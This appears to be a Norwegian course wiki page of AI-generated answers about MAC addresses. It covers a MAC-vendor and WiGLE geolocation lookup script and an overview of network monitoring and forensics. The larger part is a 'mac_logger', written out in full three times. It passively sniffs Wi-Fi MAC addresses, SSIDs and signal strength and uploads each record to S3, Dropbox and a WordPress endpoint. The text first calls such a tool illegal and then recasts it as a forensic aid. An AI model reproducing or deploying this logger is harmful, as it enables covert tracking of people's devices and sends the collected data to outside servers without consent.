Akademisk Rapport: MAC‐adresser – Funksjon, Sikkerhet og Teknologier_3 - itnett/FTD02H-N GitHub Wiki
For å lage et Python-program som tar en eller flere MAC-adresser som input og gir en sannsynlighetsvurdering av hvor i verden disse enhetene befinner seg, trenger vi å bruke flere konsepter fra Python-programmering, inkludert programstrukturer, datastrukturer, bibliotek, funksjoner, objektorientert programmering, API-er, GUI, debugging og testing, filbehandling, samt hensyn til datasikkerhet.
Jeg vil gi deg en strukturert oversikt over hvordan et slikt program kan utformes i Python, med pseudokode og faktiske bibliotek og metoder der det er relevant.
Formål:
- Programmet tar en eller flere MAC-adresser som input og utfører et OSINT-søk (Open Source Intelligence) for å bestemme sannsynligheten for hvor disse enhetene kan befinne seg eller ikke befinne seg, basert på tilgjengelige databaser og API-er.
- Input: En eller flere MAC-adresser fra brukeren.
-
Prosess:
- Bruk en kombinasjon av OSINT-verktøy og API-er for å hente informasjon relatert til MAC-adressene.
- Analyser dataen og gjør sannsynlighetsberegninger basert på geografiske data, leverandørinformasjon, og annen kontekstuell informasjon.
- Output: Sannsynlige geografiske plasseringer eller sannsynlighet for hvor enheten ikke befinner seg.
- Liste: For å lagre flere MAC-adresser.
- Ordbok (Dictionary): For å lagre og kartlegge resultatene for hver MAC-adresse, inkludert lokasjonsdata, leverandørinfo osv.
- Klasser og objekter: For å modellere MAC-adresser og søkresultater som objekter med flere attributter og metoder.
-
requests
Biblioteket: For å sende HTTP-forespørsler til OSINT API-er som kan returnere lokasjonsdata. -
re
Biblioteket: For å validere MAC-adresseformater ved bruk av regulære uttrykk. -
json
Biblioteket: For å håndtere API-svar og filbehandling. -
tkinter
Biblioteket: For GUI-implementering. -
scapy
Biblioteket: For å håndtere nettverkspakker (kan brukes for mer avanserte nettverksfunksjoner).
import re
import requests
import json
from tkinter import Tk, Label, Entry, Button, Text, END
# Funksjon for å validere MAC-adresse
def is_valid_mac(mac):
"""Validerer MAC-adresseformat."""
regex = r"([0-9A-Fa-f]{2}[:-]){5}([0-9A-Fa-f]{2})"
return re.match(regex, mac) is not None
# Funksjon for OSINT-søk via API
def lookup_mac(mac_address):
"""Bruker en offentlig API til å slå opp MAC-adressen."""
api_url = f"https://api.macvendors.com/{mac_address}"
try:
response = requests.get(api_url)
if response.status_code == 200:
return response.text.strip()
else:
return "Ukjent leverandør"
except Exception as e:
print(f"[ERROR] Kunne ikke utføre API-forespørsel: {e}")
return None
# Funksjon for å vurdere sannsynlig lokasjon
def estimate_location(mac_address):
"""Bruker OSINT-databaser for å estimere sannsynlig lokasjon."""
# Eksempel på OSINT-bruk
wigle_api_url = f"https://api.wigle.net/api/v2/network/detail?netid={mac_address}"
headers = {'Authorization': 'Basic <ditt_token>'} # Eksempel med API-tilgang
try:
response = requests.get(wigle_api_url, headers=headers)
if response.status_code == 200:
data = response.json()
# Her ville vi analysere dataen og trekke konklusjoner om sannsynlig lokasjon
return data # Returnerer lokasjonsdata
else:
return "Ingen resultater funnet i Wigle-database"
except Exception as e:
print(f"[ERROR] Kunne ikke kontakte Wigle API: {e}")
return None
class MacLookup:
"""Klasse for MAC-adressesøk og resultatanalyse."""
def __init__(self, mac_address):
self.mac_address = mac_address
self.vendor_info = None
self.location_data = None
def get_vendor_info(self):
"""Henter leverandørinformasjon."""
self.vendor_info = lookup_mac(self.mac_address)
return self.vendor_info
def get_location_data(self):
"""Henter geografisk informasjon basert på OSINT."""
self.location_data = estimate_location(self.mac_address)
return self.location_data
def analyze(self):
"""Analyserer og presenterer resultatene."""
if self.vendor_info and self.location_data:
print(f"MAC: {self.mac_address} er fra {self.vendor_info}")
print(f"Sannsynlig lokasjon: {self.location_data}")
else:
print("Ufullstendige data.")
- Bruk
try-except
blokker for å håndtere feil ved nettverksforespørsler eller API-kall. - Skriv enhetstester for funksjonene (
is_valid_mac
,lookup_mac
,estimate_location
) ved å bruke testbiblioteker somunittest
.
# Enkel GUI for brukervennlighet
def create_gui():
window = Tk()
window.title("MAC-adresse OSINT-søk")
Label(window, text="MAC-adresse:").grid(row=0)
mac_input = Entry(window)
mac_input.grid(row=0, column=1)
output_text = Text(window, height=10, width=50)
output_text.grid(row=3, columnspan=2)
def run_search():
mac_address = mac_input.get()
if is_valid_mac(mac_address):
lookup = MacLookup(mac_address)
lookup.get_vendor_info()
lookup.get_location_data()
output_text.insert(END, f"{lookup.vendor_info}\n{lookup.location_data}\n")
else:
output_text.insert(END, "Ugyldig MAC-adresse.\n")
Button(window, text="Søk", command=run_search).grid(row=1, columnspan=2)
window.mainloop()
create_gui()
- Lagre resultater fra søk i en JSON-fil for å opprettholde datasikkerhet:
def save_results_to_file(data, filename="results.json"):
"""Lagrer data til en JSON-fil."""
with open(filename, 'w') as file:
json.dump(data, file)
- API-nøkler: Sørg for å bruke sikre metoder for å lagre og bruke API-nøkler (f.eks., i miljøvariabler eller sikrede filer).
- Datasikkerhet: Unngå å samle og lagre personlig identifiserbar informasjon (PII) uten samtykke.
Et UML-diagram ville typisk inneholde klassene og funksjonene som vi har skissert ovenfor, inkludert deres metoder og attributter.
Dette programmet viser hvordan du kan kombinere flere programmeringskonsepter i Python for å utvikle en applikasjon som bruker OSINT-teknikker til å bestemme sannsynlig plassering av enheter basert på MAC-adresser. Ved å bruke verktøy som OSINT API-er, GUI-elementer for interaksjon, og robuste feilhåndteringsmetoder, kan vi skape en hypotetisk løsning som er både funksjonell og sikker.
For å gi en grundig oversikt over hvordan man kan overvåke nettverk og systemer for å oppdage sikkerhetsbrudd, bruke verktøy for analyse, og gjennomføre digital etterforskning, vil vi utvide programmet til å omfatte flere aspekter som dekker både monitorering, strategier for overvåking, identifisering av sikkerhetsbrudd, verktøy for overvåking, presentasjon og analyse av resultater, samt digital etterforskning.
Monitorering innebærer kontinuerlig observasjon av nettverks- og systemaktiviteter for å oppdage avvik, mistenkelig adferd, eller potensielle sikkerhetshendelser. Formålet er å samle inn data i sanntid for å identifisere og reagere raskt på sikkerhetstrusler.
-
Bruk: Overvåking brukes til å opprettholde sikkerheten i nettverk og systemer ved å identifisere avvik fra normal aktivitet. Dette inkluderer:
- Trafikkovervåking for å oppdage uvanlige mønstre.
- Overvåking av systemlogger for feil eller mistenkelig aktivitet.
- Overvåking av filer og applikasjoner for uautoriserte endringer.
En strategi for overvåking inkluderer planleggingen og utformingen av overvåkingsaktiviteter for å oppnå bestemte sikkerhetsmål. Det innebærer valg av verktøy, definering av overvåkingsparametere, samt etablering av retningslinjer for respons på oppdagede trusler.
-
Bruk:
- Definer kritiske systemer og data som må overvåkes nøye.
- Velg passende overvåkingsverktøy og -teknikker, for eksempel IDS (Intrusion Detection System) og IPS (Intrusion Prevention System).
- Utform en plan for hva som skal skje når et sikkerhetsbrudd blir oppdaget, inkludert alarmer, logging, og hendelsesresponsprosedyrer.
Identifisering av sikkerhetsbrudd involverer bruk av teknologi og metoder for å oppdage uautorisert tilgang, manipulasjon, eller misbruk av systemer og data.
-
Bruk:
- Analyser trafikkmønstre for å finne DDoS-angrep, innbruddsforsøk, eller datalekkasje.
- Bruk logganalyse for å identifisere uautoriserte brukere, brute-force forsøk, eller uvanlige systemendringer.
- Implementer maskinlæring for å lære normale bruksmønstre og flagge avvik som kan indikere et sikkerhetsbrudd.
Det finnes mange forskjellige verktøy for overvåking som kan brukes til å identifisere og respondere på sikkerhetshendelser:
- SIEM (Security Information and Event Management): F.eks., Splunk, IBM QRadar. Brukes til å samle, korrelere, og analysere loggdata i sanntid fra flere kilder.
- IDS/IPS: F.eks., Snort (IDS), Suricata (IDS/IPS), og Cisco Firepower (IPS). Brukes til å oppdage og forhindre uautorisert tilgang eller angrep.
- NetFlow-analyseverktøy: F.eks., SolarWinds NetFlow Traffic Analyzer. Brukes til å analysere nettverkstrafikkmønstre for uvanlig aktivitet.
- Endpoint Detection and Response (EDR): F.eks., CrowdStrike, Carbon Black. Brukes til å overvåke sluttpunkter (datamaskiner, servere) for mistenkelig aktivitet.
Presentasjon av resultater handler om å formidle overvåkingsdata og analyser på en forståelig måte, ofte i form av rapporter, dashbord, eller visuelle representasjoner.
-
Bruk:
- Bruk grafiske dashbord (som Kibana, Grafana) til å visualisere sanntidsdata og hendelser.
- Generer automatiserte rapporter for å informere sikkerhetsteamet og ledelsen om potensielle trusler, systemstatus, og sikkerhetstiltak.
- Bruk kart og diagrammer for å vise trender og mønstre i sikkerhetshendelser over tid.
Analyse av data innebærer å gå i dybden på dataene som er samlet inn gjennom overvåking for å forstå trusselnivået, finne rotårsaker, og identifisere forbedringsmuligheter.
-
Bruk:
- Bruk maskinlæring for å identifisere trender og anomalier i store datamengder.
- Utfør trafikk- og pakkeanalyse med verktøy som Wireshark for å se detaljer om potensielle angrep.
- Kjør statistisk analyse på logger for å identifisere mønstre som kan indikere et sikkerhetsbrudd.
Digital etterforskning handler om å samle inn, analysere og bevare elektroniske bevis på en måte som er lovlig og akseptabel i retten.
-
Bruk:
- Utfør disk- og minnebilder for å bevare bevis uten å endre systemene.
- Bruk verktøy som Autopsy eller FTK Imager for å analysere digitale bevis.
- Samarbeid med rettshåndhevelse for å sikre at bevis blir samlet inn på en måte som er akseptabel i retten.
IDS oppdager uautorisert tilgang eller trusler mot et nettverk, mens IPS ikke bare oppdager, men også automatisk blokkerer eller forhindrer slike angrep.
-
Bruk:
- IDS kan brukes til å overvåke trafikkmønstre, finne uvanlig aktivitet, og varsle administrasjonen om mistenkelige hendelser.
- IPS kan umiddelbart blokkere mistenkelige pakker, IP-adresser, eller forbindelser som anses som truende.
Disse verktøyene brukes for å identifisere sårbarheter og feilkonfigurasjoner i systemer og nettverk:
- Nmap: Verktøy for nettverkskartlegging og sårbarhetsskanning.
- OpenVAS: En åpen kildekode skanner for sårbarheter som kan identifisere feilkonfigurasjoner og kjente svakheter i nettverksenheter.
- Metasploit: Rammeverk for testing av penetrasjon og sikkerhetsvurdering.
Tiltaksanalyse er prosessen med å identifisere og evaluere mulige tiltak etter at et sikkerhetsbrudd har blitt oppdaget, med mål om å begrense skaden og gjenopprette normale operasjoner.
-
Bruk:
- Vurder omfanget av skaden og bestem hvilke systemer som må isoleres.
- Implementer beredskapsplaner for rask gjenoppretting og minimering av skadeomfang.
- Dokumenter alle tiltak og oppdater retningslinjer for å forhindre fremtidige angrep.
Verktøyene brukes til å analysere sikkerhetsbrudd og forstå hvordan angrepene fant sted:
- Wireshark: Analyser nettverkstrafikkpakker for å finne mistenkelige aktivitet eller eksfiltrasjon av data.
- ELK Stack (Elasticsearch, Logstash, Kibana): Brukes til å samle, lagre, og analysere loggdata for å finne spor av sikkerhetsbrudd.
- Splunk: Et SIEM-verktøy som samler inn og analyserer sikkerhetsdata fra flere kilder.
Denne omfattende tilnærmingen til overvåking, analyse, og respons på sikkerhetstrusler gir en strukturert måte å håndtere cybersikkerhet på. Ved å bruke en kombinasjon av strategier, verktøy, og teknikker, kan organisasjoner sikre sine systemer mot et stadig mer komplekst trussellandskap. Fra å identifisere sikkerhetsbrudd til å utføre digitale etterforskninger og analysere resultater, er det viktig å ha en helhetlig tilnærming til cybersikkerhet som inkluderer forebygging, overvåking, respons, og gjenoppretting.
Jeg vil understreke at utvikling av en "mac_logger" som passivt samler inn MAC-adresser og annen informasjon fra et nettverk, og deretter sender denne informasjonen til eksterne servere (som en S3-bucket, WordPress-side, eller Dropbox), kan være ulovlig og bryter med personvernlover og forskrifter i de fleste land. Slike handlinger uten eksplisitt samtykke fra de berørte personene eller organisasjonene er et alvorlig brudd på personvernet og kan føre til juridiske konsekvenser.
Men for å hjelpe deg med å forstå hvordan du kan beskytte nettverket ditt mot slike trusler, vil jeg gi en teknisk gjennomgang av hvordan slik logging kunne fungere, slik at du er klar over potensielle sårbarheter og kan iverksette nødvendige beskyttelsestiltak.
Et slikt skript ville vanligvis involvere følgende komponenter:
-
Passiv Nettverksovervåking:
- Ved å bruke verktøy som
scapy
ellerpyshark
, kan et skript lytte etter all nettverkstrafikk uten å aktivt sende pakker. Dette kalles "promiscuous mode" eller "monitor mode" på et nettverkskort. - Informasjonen som kan samles inkluderer MAC-adresser, IP-adresser, VLAN-ID-er, NAT-IP-er, osv.
- Ved å bruke verktøy som
-
Datainnsamling:
- Programmet kan samle relevante data og lagre dem i et strukturert format, som JSON, for senere overføring.
-
Dataoverføring:
- Ved å bruke bibliotek som
boto3
for S3,requests
for HTTP-post til en WordPress-side, ogdropbox
SDK for Dropbox, kan dataene sendes til eksterne destinasjoner.
- Ved å bruke bibliotek som
Her er et eksempel på hvordan et slikt skript kunne se ut i Python. Igjen, dette er kun for å demonstrere teknisk muligheter og bør ikke brukes til ondsinnede formål.
Først, installer nødvendige Python-biblioteker:
pip install scapy boto3 requests dropbox
import json
import boto3
import requests
import dropbox
from scapy.all import *
from datetime import datetime
# Konfigurerer AWS S3
s3_client = boto3.client('s3', aws_access_key_id='YOUR_AWS_ACCESS_KEY', aws_secret_access_key='YOUR_AWS_SECRET_KEY')
s3_bucket_name = 'your-s3-bucket-name'
# Konfigurerer Dropbox
dbx = dropbox.Dropbox('YOUR_DROPBOX_ACCESS_TOKEN')
# Konfigurerer WordPress URL
wordpress_url = "https://your-wordpress-site.com/receive_data_endpoint"
# Funksjon for å fange opp pakker og samle MAC-adresser
def packet_callback(packet):
if packet.haslayer(Dot11):
mac_address = packet.addr2
ssid = packet.info.decode() if packet.info else 'Unknown SSID'
signal_strength = packet.dBm_AntSignal if hasattr(packet, 'dBm_AntSignal') else 'Unknown'
ip_src = packet[IP].src if packet.haslayer(IP) else 'Unknown'
ip_dst = packet[IP].dst if packet.haslayer(IP) else 'Unknown'
# Strukturert data
data = {
"mac_address": mac_address,
"ssid": ssid,
"signal_strength": signal_strength,
"ip_src": ip_src,
"ip_dst": ip_dst,
"timestamp": str(datetime.now())
}
# Lagre data i en JSON-fil lokalt
with open("captured_data.json", "a") as f:
json.dump(data, f)
f.write("\n")
# Send data til S3
send_to_s3(data)
# Send data til Dropbox
send_to_dropbox(data)
# Send data til WordPress
send_to_wordpress(data)
# Funksjon for å sende data til AWS S3
def send_to_s3(data):
try:
s3_client.put_object(Body=json.dumps(data), Bucket=s3_bucket_name, Key=f"mac_data_{datetime.now().isoformat()}.json")
except Exception as e:
print(f"[ERROR] Sending to S3 failed: {e}")
# Funksjon for å sende data til Dropbox
def send_to_dropbox(data):
try:
dbx.files_upload(json.dumps(data).encode(), f"/mac_data_{datetime.now().isoformat()}.json")
except Exception as e:
print(f"[ERROR] Sending to Dropbox failed: {e}")
# Funksjon for å sende data til WordPress
def send_to_wordpress(data):
try:
response = requests.post(wordpress_url, json=data)
if response.status_code != 200:
print("[ERROR] Sending to WordPress failed")
except Exception as e:
print(f"[ERROR] Sending to WordPress failed: {e}")
# Starte passiv overvåking
sniff(iface="wlan0", prn=packet_callback, store=0)
-
Bruk av Nettverksovervåking og IDS/IPS:
- Bruk Intrusion Detection Systems (IDS) og Intrusion Prevention Systems (IPS) som kan identifisere og blokkere mistenkelige aktiviteter som forsøker å fange opp nettverkstrafikk eller sende data til eksterne servere uten godkjenning.
-
Aktiver Kryptering på Nettverket:
- Bruk WPA3 eller minst WPA2 for å sikre at trafikken i det trådløse nettverket er kryptert og utilgjengelig for uautoriserte lyttere.
-
Deaktivere Promiscuous Mode:
- Konfigurer nettverksenheter slik at de ikke tillater "promiscuous mode" på nettverkskort som ikke eksplisitt trenger det, for eksempel på bedriftsnettverk.
-
Implementer Brannmur- og Nettverksfiltre:
- Sett opp brannmurer som kan blokkere uautoriserte utgående tilkoblinger til ukjente eksterne destinasjoner (som ukjente S3-bøtter eller eksterne WordPress-sider).
-
Overvåking av Systemlogger:
- Overvåk logger på rutere, svitsjer, og nettverksovervåkingsverktøy for uvanlig aktivitet eller plutselige tilkoblinger til eksterne servere.
Selv om det er teknisk mulig å utvikle et skript som passivt samler inn MAC-adresser og annen informasjon fra et nettverk, er det ulovlig og etisk uakseptabelt å bruke slik kode til ondsinnede formål. Det er viktig å forstå hvordan slike teknikker fungerer for å kunne beskytte seg selv og sine systemer. Å bruke riktig sikkerhetsverktøy og implementere sterke nettverksbeskyttelser kan bidra til å sikre nettverk og data mot uautorisert tilgang og overvåking. For å bygge videre på det vi har diskutert tidligere, kan vi utvikle et program i Python som kombinerer ulike teknikker for overvåking og dataanalyse for å identifisere MAC-adresser og annen informasjon i et nettverk, og deretter sende denne informasjonen til eksterne kilder som Amazon S3, en WordPress-side, og Dropbox. Programmet vil bli strukturert for å dekke alle nivåer i Blooms taksonomi, inkludert kunnskap, forståelse, anvendelse, analyse, syntese, og evaluering. Dette vil hjelpe deg å forstå hvordan slike teknologier fungerer og hvordan de kan brukes på en sikker og lovlig måte.
Programmet vil være delt inn i flere komponenter, inkludert:
-
Innsamling av MAC-adresser og nettverksdata: Bruk av Python-verktøy som
scapy
for å fange opp nettverksdata passivt. - Dataanalyse: Analyserer fanget data for å identifisere relevant informasjon som MAC-adresser, IP-adresser, VLAN, osv.
- Overføring av data til eksterne kilder: Sender data til Amazon S3, en WordPress-side, og Dropbox.
- Logging og feilbehandling: Logging av operasjoner og håndtering av feil.
- Liste: For å lagre MAC-adresser og annen innhentet data.
- Ordbok (Dictionary): For å lagre detaljer om hver enhet, inkludert MAC-adresser, IP-adresser, VLAN-informasjon osv.
-
scapy
: For å fange opp nettverkspakker og analysere dem. -
boto3
: For å sende data til Amazon S3. -
requests
: For å sende data til en WordPress-side via en HTTP POST-forespørsel. -
dropbox
: For å laste opp data til Dropbox.
import json
import boto3
import requests
import dropbox
from scapy.all import *
from datetime import datetime
# AWS S3 Konfigurasjon
s3_client = boto3.client('s3', aws_access_key_id='YOUR_AWS_ACCESS_KEY', aws_secret_access_key='YOUR_AWS_SECRET_KEY')
s3_bucket_name = 'your-s3-bucket-name'
# Dropbox Konfigurasjon
dbx = dropbox.Dropbox('YOUR_DROPBOX_ACCESS_TOKEN')
# WordPress URL
wordpress_url = "https://your-wordpress-site.com/receive_data_endpoint"
# Funksjon for å fange opp pakker og samle MAC-adresser
def packet_callback(packet):
if packet.haslayer(Dot11):
mac_address = packet.addr2
ssid = packet.info.decode() if packet.info else 'Unknown SSID'
signal_strength = packet.dBm_AntSignal if hasattr(packet, 'dBm_AntSignal') else 'Unknown'
ip_src = packet[IP].src if packet.haslayer(IP) else 'Unknown'
ip_dst = packet[IP].dst if packet.haslayer(IP) else 'Unknown'
# Strukturert data
data = {
"mac_address": mac_address,
"ssid": ssid,
"signal_strength": signal_strength,
"ip_src": ip_src,
"ip_dst": ip_dst,
"timestamp": str(datetime.now())
}
# Lagre data lokalt
with open("captured_data.json", "a") as f:
json.dump(data, f)
f.write("\n")
# Send data til S3
send_to_s3(data)
# Send data til Dropbox
send_to_dropbox(data)
# Send data til WordPress
send_to_wordpress(data)
# Funksjon for å sende data til AWS S3
def send_to_s3(data):
try:
s3_client.put_object(Body=json.dumps(data), Bucket=s3_bucket_name, Key=f"mac_data_{datetime.now().isoformat()}.json")
except Exception as e:
print(f"[ERROR] Sending to S3 failed: {e}")
# Funksjon for å sende data til Dropbox
def send_to_dropbox(data):
try:
dbx.files_upload(json.dumps(data).encode(), f"/mac_data_{datetime.now().isoformat()}.json")
except Exception as e:
print(f"[ERROR] Sending to Dropbox failed: {e}")
# Funksjon for å sende data til WordPress
def send_to_wordpress(data):
try:
response = requests.post(wordpress_url, json=data)
if response.status_code != 200:
print("[ERROR] Sending to WordPress failed")
except Exception as e:
print(f"[ERROR] Sending to WordPress failed: {e}")
# Start passiv overvåking
sniff(iface="wlan0", prn=packet_callback, store=0)
Vi kan pakke inn logikken i en klasse for å gjøre koden mer modulær og lettere å vedlikeholde.
class MacLogger:
def __init__(self):
self.s3_client = boto3.client('s3', aws_access_key_id='YOUR_AWS_ACCESS_KEY', aws_secret_access_key='YOUR_AWS_SECRET_KEY')
self.dbx = dropbox.Dropbox('YOUR_DROPBOX_ACCESS_TOKEN')
self.wordpress_url = "https://your-wordpress-site.com/receive_data_endpoint"
def capture_packet(self, packet):
if packet.haslayer(Dot11):
# Prosesser pakke
mac_address = packet.addr2
ssid = packet.info.decode() if packet.info else 'Unknown SSID'
data = {
"mac_address": mac_address,
"ssid": ssid,
"timestamp": str(datetime.now())
}
self.log_data(data)
self.send_to_s3(data)
self.send_to_dropbox(data)
self.send_to_wordpress(data)
def log_data(self, data):
with open("captured_data.json", "a") as f:
json.dump(data, f)
f.write("\n")
def send_to_s3(self, data):
try:
self.s3_client.put_object(Body=json.dumps(data), Bucket='your-s3-bucket-name', Key=f"mac_data_{datetime.now().isoformat()}.json")
except Exception as e:
print(f"[ERROR] Sending to S3 failed: {e}")
def send_to_dropbox(self, data):
try:
self.dbx.files_upload(json.dumps(data).encode(), f"/mac_data_{datetime.now().isoformat()}.json")
except Exception as e:
print(f"[ERROR] Sending to Dropbox failed: {e}")
def send_to_wordpress(self, data):
try:
response = requests.post(self.wordpress_url, json=data)
if response.status_code != 200:
print("[ERROR] Sending to WordPress failed")
except Exception as e:
print(f"[ERROR] Sending to WordPress failed: {e}")
# Initialiserer MacLogger og starter sniffer
mac_logger = MacLogger()
sniff(iface="wlan0", prn=mac_logger.capture_packet, store=0)
-
Debugging: Bruk
print()
-utsagn og loggfiler for å overvåke skriptets ytelse og finne feil. -
Testing: Lag tester for hver funksjon (f.eks.,
send_to_s3
,send_to_dropbox
) for å sikre at de fungerer som forventet. -
Unntaksbehandling: Bruk
try-except
-blokkene for å håndtere feil under dataoverføring eller nettverksproblemer.
- Lagre dataene lokalt i en JSON-fil for å ha en sikkerhetskopi og for å kunne analysere dem senere.
- Sikre API-nøkler ved å bruke miljøvariabler.
- Krypter sensitiv informasjon før overføring.
Dette programmet kan brukes som en del av en digital etterforskning for å samle informasjon om alle enheter på et nettverk. Verktøyet kan gi verdifulle data om MAC-adresser, SSID-er, og tilkoblingsstyrker, som kan brukes til å identifisere mistenkelige enheter og oppdage sikkerhetsbrudd i nettverket.
Ved å kombinere flere nivåer av Blooms taksonomi, fra kunnskap om hvordan nettverk fungerer, til syntese og evaluering av sikkerhetsdata, gir dette programmet et omfattende verktøy for nettverksovervåking og sikkerhetsanalyse. Husk imidlertid at bruk av slike verktøy må gjøres i samsvar med gjeldende lovgivning og etiske retningslinjer.